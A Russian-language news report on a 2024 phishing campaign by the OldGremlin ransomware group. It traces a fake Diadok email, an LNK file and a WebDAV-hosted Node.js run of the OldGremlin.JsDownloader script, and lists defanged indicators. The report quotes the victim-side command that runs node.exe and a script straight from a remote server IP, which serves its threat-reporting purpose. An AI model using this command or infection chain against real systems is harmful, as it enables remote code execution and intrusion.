Вымогательская группировка OldGremlin атаковала российские компании в 2020-2022 годах, и суммы требуемых выкупов исчислялись миллионами, а в 2022 году ценник поднялся до 1 миллиарда рублей. Теперь специалисты FACCT сообщили, что группа снова активна и использует новый инструмент OldGremlin.JsDownloader.
Недавно аналитики компании обнаружили загруженное на платформу AnyRun письмо, которое было отправлено от имени сотрудницы компании «Диадок» с использованием адреса электронной почты - Ольга Макарова <makarova@diadok[.]net>. Получателем письма был сотрудник неназванной российской нефтехимической компании.
Письмо было отправлено 12 августа 2024 года и имело тему «Уведомление из Диадок: документы требуют вашего участия». Домен diadok[.]net, с которого было отправлено вредоносное письмо, имитировал оригинальный домен компании «Контур.Диадок» —diadoc[.]ru, что привлекло внимание исследователей, поскольку ранее мимикрия под «Диадок» уже встречалась в атаках OldGremlin.
Аналитики рассказывают, что письмо содержало ссылку (hxxps://diadok[.]net/1ealfus19t) для скачивания файла «счет-фактура.xlsx». После перехода по ссылке загружался архив Счет_фактура_от-09-09-2024[.]zip, содержащий LNK-файл «Счет_фактура_от-09-08-2024.xlsx.lnk». После запуска происходило подключение к WebDav-серверу (46[.]101[.]122[.]204) и на стороне клиента (жертвы) выполнялась команда: \\46[.]101[.]122[.]204\DavWWWRoot\node.exe \\46[.]101[.]122[.]204\DavWWWRoot\word.txt. Исследователи отмечают, что и WebDAV ранее так же встречался в атаках OldGremlin.
Загруженный файл node.exe является Node.js интерпретатором версии v0.10.48 и доступен для загрузки с официального сайта Node.js (hxxps://nodejs[.]org/) по ссылке hxxps://nodejs[.]org/dist/v0.10.48/node.exe. И в предыдущих атаках OldGremlin тоже использовали Node.js интерпретаторы.
В конечном итоге на машине жертвы, вместо запуска XLS-приманки и очередного дочернего процесса, происходит запуск JavaScript-сценария (OldGremlin.JsDownloader), в задачи которого входит загрузка и выполнение произвольных JavaScript-сценариев.
Этот скрипт исполняется в виде анонимной функции. После того как она будет запущена, выполняется подключение к серверу 157[.]230[.]18[.]205:80, после чего на управляющий сервер отправляется случайно сгенерированный набор данных размером 32 байта. Полученным ответом будет подпись отправленного набора данных. Далее выполнится проверка полученной подписи с заданными параметрами публичного ключа.
Если проверка подписи прошла успешно, OldGremlin.JsDownloader будет ожидать данных от своего управляющего сервера. А когда вредоносный загрузчик получит данные от сервера, они будут расшифрованы и переданы в функцию eval(), которая позволяет выполнить произвольный JavaScript-код. Алгоритм шифрования данных — RC4, где ключом является хеш-сумма MD5, полученная от случайно сгенерированного набора байт, который был отправлен на сервер ранее.
Представители «Контур.Диадок» уже предупредили о происходящем пользователей своего сервиса, отправив им предупреждающие письма, а также подготовили официальное заявление. Подчеркивается, что «Контур.Диадок» не был задействован в атаке или скомпрометирован, и злоумышленники используют бренд сервиса для рассылки малвари.
